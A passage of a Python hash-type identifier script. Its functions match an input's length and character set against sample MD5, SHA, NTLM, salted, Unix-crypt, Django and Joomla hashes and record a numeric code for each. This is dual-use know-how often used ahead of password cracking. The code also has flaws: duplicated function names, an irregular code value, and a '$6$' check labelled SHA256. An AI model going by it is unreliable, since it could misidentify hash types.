if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("101020")
|
||||
def CRC16CCITT(hash):
|
||||
hs='3d08'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("101040")
|
||||
def FCS16(hash):
|
||||
hs='0e5b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("101060")
|
||||
|
||||
def CRC32(hash):
|
||||
hs='b33fd057'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("102040")
|
||||
def ADLER32(hash):
|
||||
hs='0607cb42'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("102020")
|
||||
def CRC32B(hash):
|
||||
hs='b764a0d9'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("102060")
|
||||
def XOR32(hash):
|
||||
hs='0000003f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("102080")
|
||||
|
||||
def GHash323(hash):
|
||||
hs='80000000'
|
||||
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("103040")
|
||||
def GHash325(hash):
|
||||
hs='85318985'
|
||||
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("103020")
|
||||
|
||||
def DESUnix(hash):
|
||||
hs='ZiY8YtDKXJwYQ'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
|
||||
jerar.append("104020")
|
||||
|
||||
def MD5Half(hash):
|
||||
hs='ae11fd697ec92c7c'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("105060")
|
||||
def MD5Middle(hash):
|
||||
hs='7ec92c7c98de3fac'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("105040")
|
||||
def MySQL(hash):
|
||||
hs='63cea4673fd25f46'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("105020")
|
||||
|
||||
def DomainCachedCredentials(hash):
|
||||
hs='f42005ec1afe77967cbc83dce1b4d714'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106025")
|
||||
def Haval128(hash):
|
||||
hs='d6e3ec49aa0f138a619f27609022df10'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106160")
|
||||
def Haval128HMAC(hash):
|
||||
hs='3ce8b0ffd75bc240fc7d967729cd6637'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106165")
|
||||
def MD2(hash):
|
||||
hs='08bbef4754d98806c373f2cd7d9a43c4'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106060")
|
||||
def MD2HMAC(hash):
|
||||
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106120")
|
||||
def MD4(hash):
|
||||
hs='a2acde400e61410e79dacbdfc3413151'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106040")
|
||||
def MD4HMAC(hash):
|
||||
hs='6be20b66f2211fe937294c1c95d1cd4f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106100")
|
||||
def MD5(hash):
|
||||
hs='ae11fd697ec92c7c98de3fac23aba525'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106020")
|
||||
def MD5HMAC(hash):
|
||||
hs='d57e43d2c7e397bf788f66541d6fdef9'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106080")
|
||||
def MD5HMACWordpress(hash):
|
||||
hs='3f47886719268dfa83468630948228f6'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106140")
|
||||
def NTLM(hash):
|
||||
hs='cc348bace876ea440a28ddaeb9fd3550'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106029")
|
||||
def RAdminv2x(hash):
|
||||
hs='baea31c728cbf0cd548476aa687add4b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106027")
|
||||
def RipeMD128(hash):
|
||||
hs='4985351cd74aff0abc5a75a0c8a54115'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106180")
|
||||
def RipeMD128HMAC(hash):
|
||||
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106185")
|
||||
def SNEFRU128(hash):
|
||||
hs='4fb58702b617ac4f7ca87ec77b93da8a'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106200")
|
||||
def SNEFRU128HMAC(hash):
|
||||
hs='59b2b9dcc7a9a7d089cecf1b83520350'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106205")
|
||||
def Tiger128(hash):
|
||||
hs='c086184486ec6388ff81ec9f23528727'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106220")
|
||||
def Tiger128HMAC(hash):
|
||||
hs='c87032009e7c4b2ea27eb6f99723454b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106225")
|
||||
def md5passsalt(hash):
|
||||
hs='5634cc3b922578434d6e9342ff5913f7'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106240")
|
||||
def md5saltmd5pass(hash):
|
||||
hs='245c5763b95ba42d4b02d44bbcd916f1'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106260")
|
||||
def md5saltpass(hash):
|
||||
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106280")
|
||||
def md5saltpasssalt(hash):
|
||||
hs='469e9cdcaff745460595a7a386c4db0c'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106300")
|
||||
def md5saltpassusername(hash):
|
||||
hs='9ae20f88189f6e3a62711608ddb6f5fd'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106320")
|
||||
def md5saltmd5pass(hash):
|
||||
hs='aca2a052962b2564027ee62933d2382f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106340")
|
||||
def md5saltmd5passsalt(hash):
|
||||
hs='de0237dc03a8efdf6552fbe7788b2fdd'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106360")
|
||||
def md5saltmd5passsalt(hash):
|
||||
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106380")
|
||||
def md5saltmd5saltpass(hash):
|
||||
hs='d8f3b3f004d387086aae24326b575b23'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106400")
|
||||
def md5saltmd5md5passsalt(hash):
|
||||
hs='81f181454e23319779b03d74d062b1a2'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106420")
|
||||
def md5username0pass(hash):
|
||||
hs='e44a60f8f2106492ae16581c91edb3ba'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106440")
|
||||
def md5usernameLFpass(hash):
|
||||
hs='654741780db415732eaee12b1b909119'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106460")
|
||||
def md5usernamemd5passsalt(hash):
|
||||
hs='954ac5505fd1843bbb97d1b2cda0b98f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106480")
|
||||
def md5md5pass(hash):
|
||||
hs='a96103d267d024583d5565436e52dfb3'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106500")
|
||||
def md5md5passsalt(hash):
|
||||
hs='5848c73c2482d3c2c7b6af134ed8dd89'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106520")
|
||||
def md5md5passmd5salt(hash):
|
||||
hs='8dc71ef37197b2edba02d48c30217b32'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106540")
|
||||
def md5md5saltpass(hash):
|
||||
hs='9032fabd905e273b9ceb1e124631bd67'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106560")
|
||||
def md5md5saltmd5pass(hash):
|
||||
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106580")
|
||||
def md5md5usernamepasssalt(hash):
|
||||
hs='4319a3befce729b34c3105dbc29d0c40'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106600")
|
||||
def md5md5md5pass(hash):
|
||||
hs='ea086739755920e732d0f4d8c1b6ad8d'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106620")
|
||||
def md5md5md5md5pass(hash):
|
||||
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106640")
|
||||
def md5md5md5md5md5pass(hash):
|
||||
hs='4548d2c062933dff53928fd4ae427fc0'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106660")
|
||||
def md5sha1pass(hash):
|
||||
hs='cb4ebaaedfd536d965c452d9569a6b1e'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106680")
|
||||
def md5sha1md5pass(hash):
|
||||
hs='099b8a59795e07c334a696a10c0ebce0'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106700")
|
||||
def md5sha1md5sha1pass(hash):
|
||||
hs='06e4af76833da7cc138d90602ef80070'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106720")
|
||||
def md5strtouppermd5pass(hash):
|
||||
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("106740")
|
||||
|
||||
def LineageIIC4(hash):
|
||||
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
|
||||
jerar.append("107080")
|
||||
def MD5phpBB3(hash):
|
||||
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
|
||||
jerar.append("107040")
|
||||
def MD5Unix(hash):
|
||||
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
|
||||
jerar.append("107060")
|
||||
def MD5Wordpress(hash):
|
||||
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
|
||||
jerar.append("107020")
|
||||
|
||||
def MD5APR(hash):
|
||||
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
|
||||
jerar.append("108020")
|
||||
|
||||
def Haval160(hash):
|
||||
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109100")
|
||||
def Haval160HMAC(hash):
|
||||
hs='29206f83edc1d6c3f680ff11276ec20642881243'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109200")
|
||||
def MySQL5(hash):
|
||||
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109040")
|
||||
def MySQL160bit(hash):
|
||||
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
|
||||
jerar.append("109060")
|
||||
def RipeMD160(hash):
|
||||
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109120")
|
||||
def RipeMD160HMAC(hash):
|
||||
hs='ca28af47653b4f21e96c1235984cb50229331359'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109180")
|
||||
def SHA1(hash):
|
||||
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109020")
|
||||
def SHA1HMAC(hash):
|
||||
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109140")
|
||||
def SHA1MaNGOS(hash):
|
||||
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109220")
|
||||
def SHA1MaNGOS2(hash):
|
||||
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109240")
|
||||
def Tiger160(hash):
|
||||
hs='c086184486ec6388ff81ec9f235287270429b225'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109080")
|
||||
def Tiger160HMAC(hash):
|
||||
hs='6603161719da5e56e1866e4f61f79496334e6a10'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109160")
|
||||
def sha1passsalt(hash):
|
||||
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109260")
|
||||
def sha1saltpass(hash):
|
||||
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109280")
|
||||
def sha1saltmd5pass(hash):
|
||||
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109300")
|
||||
def sha1saltmd5passsalt(hash):
|
||||
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109320")
|
||||
def sha1saltsha1pass(hash):
|
||||
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109340")
|
||||
def sha1saltsha1saltsha1pass(hash):
|
||||
hs='cc600a2903130c945aa178396910135cc7f93c63'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109360")
|
||||
def sha1usernamepass(hash):
|
||||
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109380")
|
||||
def sha1usernamepasssalt(hash):
|
||||
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109400")
|
||||
def sha1md5pass(hash):
|
||||
hs='fa960056c0dea57de94776d3759fb555a15cae87'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("1094202")
|
||||
def sha1md5passsalt(hash):
|
||||
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109440")
|
||||
def sha1md5sha1pass(hash):
|
||||
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109460")
|
||||
def sha1sha1pass(hash):
|
||||
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109480")
|
||||
def sha1sha1passsalt(hash):
|
||||
hs='780d43fa11693b61875321b6b54905ee488d7760'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109500")
|
||||
def sha1sha1passsubstrpass03(hash):
|
||||
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109520")
|
||||
def sha1sha1saltpass(hash):
|
||||
hs='70506bac605485b4143ca114cbd4a3580d76a413'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109540")
|
||||
def sha1sha1sha1pass(hash):
|
||||
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109560")
|
||||
def sha1strtolowerusernamepass(hash):
|
||||
hs='79f575543061e158c2da3799f999eb7c95261f07'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("109580")
|
||||
|
||||
def Haval192(hash):
|
||||
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("110040")
|
||||
def Haval192HMAC(hash):
|
||||
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("110080")
|
||||
def Tiger192(hash):
|
||||
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("110020")
|
||||
def Tiger192HMAC(hash):
|
||||
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("110060")
|
||||
|
||||
def MD5passsaltjoomla1(hash):
|
||||
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
|
||||
jerar.append("112020")
|
||||
|
||||
def SHA1Django(hash):
|
||||
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
|
||||
jerar.append("113020")
|
||||
|
||||
def Haval224(hash):
|
||||
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("114040")
|
||||
def Haval224HMAC(hash):
|
||||
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("114080")
|
||||
def SHA224(hash):
|
||||
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("114020")
|
||||
def SHA224HMAC(hash):
|
||||
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("114060")
|
||||
|
||||
def SHA256(hash):
|
||||
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115020")
|
||||
def SHA256HMAC(hash):
|
||||
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115120")
|
||||
def Haval256(hash):
|
||||
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115040")
|
||||
def Haval256HMAC(hash):
|
||||
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115140")
|
||||
def GOSTR341194(hash):
|
||||
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115060")
|
||||
def RipeMD256(hash):
|
||||
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115080")
|
||||
def RipeMD256HMAC(hash):
|
||||
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115160")
|
||||
def SNEFRU256(hash):
|
||||
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115100")
|
||||
def SNEFRU256HMAC(hash):
|
||||
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115180")
|
||||
def SHA256md5pass(hash):
|
||||
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115200")
|
||||
def SHA256sha1pass(hash):
|
||||
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("115220")
|
||||
|
||||
def MD5passsaltjoomla2(hash):
|
||||
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
|
||||
jerar.append("116020")
|
||||
def SAM(hash):
|
||||
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
|
||||
jerar.append("116040")
|
||||
|
||||
def SHA256Django(hash):
|
||||
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
|
||||
jerar.append("117020")
|
||||
|
||||
def RipeMD320(hash):
|
||||
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("118020")
|
||||
def RipeMD320HMAC(hash):
|
||||
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("118040")
|
||||
|
||||
def SHA384(hash):
|
||||
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("119020")
|
||||
def SHA384HMAC(hash):
|
||||
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
|
||||
jerar.append("119040")
|
||||
|
||||
def SHA256s(hash):
|
||||
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
|
||||
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
|
||||
jerar.append("120020")
|
||||
|
||||
def SHA384Django(hash):
|
||||
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
|
||||
